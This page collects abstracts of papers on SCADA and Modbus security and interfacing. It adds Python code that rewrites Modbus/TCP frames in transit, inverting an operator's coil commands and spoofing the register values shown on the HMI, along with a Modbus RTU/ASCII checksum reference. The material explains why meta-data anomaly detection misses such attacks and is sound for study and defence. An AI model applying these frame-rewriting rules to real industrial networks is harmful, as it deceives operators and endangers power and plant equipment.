
    Stealthy Deception Attacks Against SCADA Systems

    SCADA protocols for Industrial Control Systems (ICS) are vulnerable to network attacks such as session hijacking. Hence, research focuses on network anomaly detection based on meta-data (message sizes, timing, command sequence), or on the state values of the physical process. In this work we present a class of semantic network-based attacks against SCADA systems that are undetectable by the above-mentioned anomaly detection. After hijacking the communication channels between the Human Machine Interface (HMI) and Programmable Logic Controllers (PLCs), our attacks cause the HMI to present a fake view of the industrial process, deceiving the human operator into taking manual actions. Our most advanced attack also manipulates the messages generated by the operator's actions, reversing their semantic meaning while causing the HMI to present a view that is consistent with the attempted human actions. The attacks are totally stealthy because the message sizes and timing, the command sequences, and the data values of the ICS's state all remain legitimate. We implemented and tested several attack scenarios in the test lab of our local electric company, against a real HMI and real PLCs, separated by a commercial-grade firewall. We developed a real-time security assessment tool that can simultaneously manipulate the communication to multiple PLCs and cause the HMI to display a coherent system-wide fake view. Our tool is configured with message-manipulating rules written in an ICS Attack Markup Language (IAML) we designed, which may be of independent interest. Our semantic attacks all successfully fooled the operator and brought the system to states of blackout and possible equipment damage.
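    The abstract above makes a point worth seeing in bytes: a man-in-the-middle that edits only the payload of a Modbus message leaves every field a meta-data detector looks at (frame length, unit id, function code, timing, command order) untouched. The following is an added illustration, not the authors' IAML tool or any code from the paper. It assumes Modbus/TCP as the HMI-to-PLC carrier (the abstract does not name the protocol), and uses two constructed rules: flip a Write Single Coil command (FC 05) on its way to the PLC, and overwrite the register values in a Read Holding Registers response (FC 03) on its way back to the HMI. The coil address, register meanings and values are hypothetical sample data.

```python
import struct

# Modbus/TCP MBAP header: transaction id, protocol id (always 0), length, unit id
MBAP = struct.Struct(">HHHB")


def build_adu(tid: int, unit: int, fc: int, data: bytes) -> bytes:
    """Assemble a Modbus/TCP ADU; the MBAP length counts unit id + PDU bytes."""
    return MBAP.pack(tid, 0, 2 + len(data), unit) + bytes([fc]) + data


def parse_adu(frame: bytes) -> dict:
    """Split an ADU into header fields and PDU, rejecting inconsistent lengths."""
    if len(frame) < MBAP.size + 1:
        raise ValueError("frame too short for MBAP header plus function code")
    tid, pid, length, unit = MBAP.unpack_from(frame, 0)
    if pid != 0:
        raise ValueError("protocol id must be 0 for Modbus")
    if length != len(frame) - 6:
        raise ValueError("MBAP length field disagrees with frame size")
    return {"tid": tid, "unit": unit, "fc": frame[7], "data": frame[8:]}


def metadata_view(frame: bytes) -> tuple:
    """The only things a size/timing/sequence anomaly detector gets to see."""
    adu = parse_adu(frame)
    return (len(frame), adu["unit"], adu["fc"])


def invert_write_single_coil(frame: bytes) -> bytes:
    """Rule 1 (operator -> PLC): flip a Write Single Coil (FC 05) command.
    0xFF00 (ON) becomes 0x0000 (OFF) and vice versa; nothing else changes."""
    adu = parse_adu(frame)
    if adu["fc"] != 0x05 or len(adu["data"]) != 4:
        return frame
    addr, value = struct.unpack(">HH", adu["data"])
    flipped = {0xFF00: 0x0000, 0x0000: 0xFF00}.get(value)
    if flipped is None:  # malformed coil value: leave the frame untouched
        return frame
    return build_adu(adu["tid"], adu["unit"], 0x05, struct.pack(">HH", addr, flipped))


def spoof_holding_registers(frame: bytes, fake_values: list) -> bytes:
    """Rule 2 (PLC -> HMI): overwrite the values in a Read Holding Registers (FC 03)
    response with what the operator expects to see. The byte count is preserved."""
    adu = parse_adu(frame)
    if adu["fc"] != 0x03 or not adu["data"]:
        return frame
    byte_count = adu["data"][0]
    if byte_count != len(adu["data"]) - 1 or byte_count % 2:
        raise ValueError("inconsistent byte count in FC 03 response")
    n = byte_count // 2
    if len(fake_values) != n:
        raise ValueError(f"response carries {n} registers, got {len(fake_values)} fake values")
    payload = bytes([byte_count]) + struct.pack(f">{n}H", *fake_values)
    return build_adu(adu["tid"], adu["unit"], 0x03, payload)


def holding_register_values(frame: bytes) -> list:
    """Decode the register list from an FC 03 response (what the HMI would display)."""
    adu = parse_adu(frame)
    n = adu["data"][0] // 2
    return list(struct.unpack(f">{n}H", adu["data"][1:1 + n * 2]))


# Constructed sample traffic (hypothetical addresses and values, not captured data):
# the operator closes a breaker at coil 0x0010; the PLC reports [bus voltage, load %]
OPERATOR_CLOSE_BREAKER = build_adu(0x0001, 1, 0x05, struct.pack(">HH", 0x0010, 0xFF00))
PLC_REAL_STATUS = build_adu(0x0002, 1, 0x03, bytes([4]) + struct.pack(">HH", 0, 50))


if __name__ == "__main__":
    to_plc = invert_write_single_coil(OPERATOR_CLOSE_BREAKER)
    to_hmi = spoof_holding_registers(PLC_REAL_STATUS, [230, 50])
    print("command on the wire :", to_plc.hex())
    print("detector sees same  :", metadata_view(OPERATOR_CLOSE_BREAKER) == metadata_view(to_plc))
    print("PLC actually reports:", holding_register_values(PLC_REAL_STATUS))
    print("HMI is shown        :", holding_register_values(to_hmi))
```

    Both rewritten frames are byte-for-byte the same length as the originals, carry the same unit id, function code and transaction id, and arrive at the same time the genuine frame would have, so `metadata_view` cannot tell them apart. The physical-process values the HMI receives are also individually plausible, which is the abstract's second point: only an integrity mechanism that binds the payload to its source (authenticated messaging, or an out-of-band reading of the PLC state) has any purchase on this class of attack.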

    Random network coding for secure packet transmission in SCADA networks


    Interfacing Modbus Plus to EPICS for KEKB Accelerator Control System

    The KEKB Accelerator control system[1] is based on EPICS (Experimental Physics and Industrial Control System)[2] and uses many PLCs in the magnet protection systems and the radiation safety system. In order to monitor the interlock status, Modbus Plus[3] is adopted as the protocol between an IOC (Input/Output Controller) and PLCs. For this purpose, a device support and a driver support for Modbus Plus have been developed. The device/driver support modules allow an IOC to communicate with PLCs by asynchronous I/O transactions, in the same manner as GPIB devices. With the software modules, an IOC always works as a master device on the Modbus Plus network to read the status of controlled devices from PLC memory. While the main use of the software is to read the interlock status, it is also used to reset the interlock systems. Details of the software structure are described. An application of this software in the KEKB accelerator control system is also presented.

    A Review of Communication Protocols for Intelligent Remote Terminal Unit Development

    This paper reviews the possible interfacing communication protocols for a remote terminal unit (RTU). A Supervisory Control and Data Acquisition (SCADA) system is a central station that can communicate with other networks using the protocol. Fundamentally, the architectures of all networks are based on the seven layers of the Open Systems Interconnection (OSI) model of the International Organization for Standardization (ISO). The objective of designing the protocols is to check the status of all the input and output field devices and send the report according to that status. The corresponding protocol and communication parameters between the connected devices will be included in designing a complex SCADA system. The available protocols for developing RTU communication are Modbus/ASCII, Distributed Network Protocol (DNP3), Controller Area Network (CAN), International Electrotechnical Commission (IEC 60870), and Transmission Control Protocol/Internet Protocol (TCP/IP).

    Controller Area Network to Modbus network bridge to interface gas detection units with Building Management Systems

    Building Management Systems (BMSs) are computer systems designed to control systems inside buildings or other facilities. While BMSs are common, there is no one-size-fits-all approach. Controller Area Network (CAN) is a communication protocol sometimes used within BMSs. Modbus is a very common industrial communications protocol. The two protocols are not directly compatible and need to be 'bridged' to communicate with each other. Gas Detection Australia (GDA) designs and manufactures gas detection equipment. They have a current and ongoing need to interface Modbus-enabled equipment with CAN-enabled equipment in client BMSs. This project is sponsored with the aim of producing a network bridge to translate between the two protocols. The specific Modbus variation implemented is Modbus ASCII master. The design was based around the PIC 18F87K22 microprocessor. This was chosen to remain consistent with other GDA products. The communication interfaces were designed using integrated circuits that closely mimic the software development tools. This was a deliberate choice made to make software development simpler and to make it easier to translate source code to the finished product. A testing method was also created to allow the assessment of bridge performance. Testing demonstrated proof of concept using the development board. Separate testing of RS-485 hardware suggests that the full hardware specification is valid. Stress tests were carried out and determined that the bridge could be expected to be capable of responding to four CAN messages per second. The testing was limited by issues relating to the inconsistent operation of the CAN interface.

    Design and Application of Communication Gateway of EPA and MODBUS on Electric Power System

    Through research into EPA Industrial Ethernet technology, MODBUS fieldbus technology, ARM embedded systems and the μC/OS-II real-time operating system, this paper discusses how to design and develop a communication gateway between EPA and MODBUS. The communication gateway realizes bidirectional data transceiving between the EPA protocol and the MODBUS protocol. The communication gateway can provide a stable, secure, real-time and flexible solution for process control of the power plant.

    Modbus RTU for Embedded Cyber Secure Inverter Controller

    The Modbus communication protocol is a widely adopted communication standard in industrial control systems. This communication protocol is known for being reliable and straightforward to implement while being versatile in terms of its operating parameters and supporting multiple formats over various hardware infrastructures and architectures. Many intelligent devices such as Programmable Logic Controllers (PLCs), Human-Machine Interfaces (HMIs), Internet-of-Things (IoT) devices, and various Operational Technologies (OT) utilize Modbus for their communication systems. These types of systems must communicate with each other through a standardized and central communication process. To support the integration of these modular systems, a Field-Programmable Gate Array (FPGA) can act as an embedded central routing fabric for this communication to take place. Embedded systems are versatile enough to interface with various devices and systems to accomplish various goals. Additionally, embedded systems require relatively small physical designs to minimize the required resources to facilitate the intended application by providing low-level system access. This minimization of system resources goes hand in hand with reducing the financial cost of a proposed solution or system. As remotely collaborating researchers often use FPGAs to prototype designs that are required to have a method for data transmission among systems, it is imperative to provide a baseline standard for communications among devices and systems. A typical method of implementing the Modbus RTU communication protocol in an embedded environment is using integrated logic architectures within the FPGA called "Intellectual Property (IP) cores." IP cores can be designed using integrated logic or circuit designs to function as an embedded processor. These IP cores can then perform the required computational actions to support the Modbus RTU communication protocol by utilizing high-level programming languages such as the C programming language. The hardware description language VHDL (Very High-Speed Integrated Circuit Hardware Description Language) allows for the control of real hardware at the logic gate and signal level. These logic gates and signals can be designed and controlled to perform desired actions based on the system design. Programming an FPGA using VHDL allows an individual to access the lowest abstraction level of the system during FPGA development. This level of abstraction is referred to as the register-transfer level (RTL), which gives access to manipulating values and variables at the register level. This register-level manipulation provides precision over creating the logical circuit within the FPGA, thus minimizing the required code to perform desired operations. The Modbus RTU communication protocol can be implemented within an FPGA using VHDL programming to establish a standardized and embedded serial communication pathway. This implementation provides a standardized communication protocol to streamline research efforts among researchers, thus increasing the efficiency of research efforts. Additionally, this Modbus RTU implementation requires fewer resources when compared to typical communication protocol implementations that utilize an IP core, reducing the hardware requirement for effective research efforts.
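    Two of the serial Modbus variants on this page, the Modbus ASCII master implemented by the CAN bridge above and the Modbus RTU framing this FPGA work implements, carry the same PDU (unit id, function code, data) and differ only in the envelope: RTU sends raw bytes with a CRC-16 low byte first, ASCII sends a colon, uppercase hex digits, an LRC and CR LF. The block below is an added reference implementation of both envelopes in Python, written for this page; it is neither the bridge's PIC firmware nor the VHDL of the FPGA paper, and the sample request (unit 1, FC 03, ten registers from address 0) is a constructed example.

```python
def crc16_modbus(data: bytes) -> int:
    """CRC-16/MODBUS: reflected polynomial 0xA001, initial value 0xFFFF, no final XOR."""
    crc = 0xFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            lsb = crc & 1
            crc >>= 1
            if lsb:
                crc ^= 0xA001
    return crc


def lrc(data: bytes) -> int:
    """Modbus ASCII LRC: two's complement of the byte sum, truncated to 8 bits."""
    return (-sum(data)) & 0xFF


def rtu_frame(unit: int, fc: int, data: bytes) -> bytes:
    """RTU ADU: unit id, function code, data, then the CRC with the LOW byte first."""
    body = bytes([unit, fc]) + data
    crc = crc16_modbus(body)
    return body + bytes([crc & 0xFF, crc >> 8])


def rtu_crc_ok(frame: bytes) -> bool:
    """True when the trailing two bytes are the CRC of everything before them."""
    if len(frame) < 4:
        return False
    body, trailer = frame[:-2], frame[-2:]
    crc = crc16_modbus(body)
    return trailer == bytes([crc & 0xFF, crc >> 8])


def rtu_parse(frame: bytes) -> dict:
    """Split a CRC-valid RTU ADU into unit id, function code and data."""
    if not rtu_crc_ok(frame):
        raise ValueError("RTU CRC mismatch")
    return {"unit": frame[0], "fc": frame[1], "data": frame[2:-2]}


def ascii_frame(unit: int, fc: int, data: bytes) -> bytes:
    """ASCII ADU: ':' + uppercase hex of (unit, fc, data, LRC) + CR LF."""
    body = bytes([unit, fc]) + data
    return b":" + (body + bytes([lrc(body)])).hex().upper().encode("ascii") + b"\r\n"


def ascii_lrc_ok(frame: bytes) -> bool:
    """True when the frame is well delimited, is valid hex and its LRC checks out."""
    if not (frame.startswith(b":") and frame.endswith(b"\r\n")):
        return False
    try:
        raw = bytes.fromhex(frame[1:-2].decode("ascii"))
    except ValueError:  # odd length or non-hex characters
        return False
    return len(raw) >= 3 and lrc(raw[:-1]) == raw[-1]


def ascii_parse(frame: bytes) -> dict:
    """Split an LRC-valid ASCII ADU into unit id, function code and data."""
    if not ascii_lrc_ok(frame):
        raise ValueError("ASCII framing or LRC error")
    raw = bytes.fromhex(frame[1:-2].decode("ascii"))
    return {"unit": raw[0], "fc": raw[1], "data": raw[2:-1]}


# Constructed example request: unit 1, FC 03, read 10 holding registers from 0x0000
READ_10_REGS = (1, 0x03, bytes.fromhex("0000000A"))

if __name__ == "__main__":
    rtu = rtu_frame(*READ_10_REGS)
    asc = ascii_frame(*READ_10_REGS)
    print("RTU  :", rtu.hex(" "))
    print("ASCII:", asc)
    corrupted = rtu[:2] + bytes([rtu[2] ^ 1]) + rtu[3:]
    print("CRC still valid after a one-bit flip?", rtu_crc_ok(corrupted))
```

    The check values are the usual ones: CRC-16/MODBUS of the string `123456789` is `0x4B37`, and the sample request frames as `01 03 00 00 00 0A C5 CD` in RTU and `:01030000000AF2\r\n` in ASCII. Both checks exist to catch line noise, and a single flipped bit fails them; neither is an authentication mechanism, because anyone who can write to the bus can recompute the CRC or LRC for an altered PDU, which is exactly the gap the deception-attack paper at the top of this page exploits.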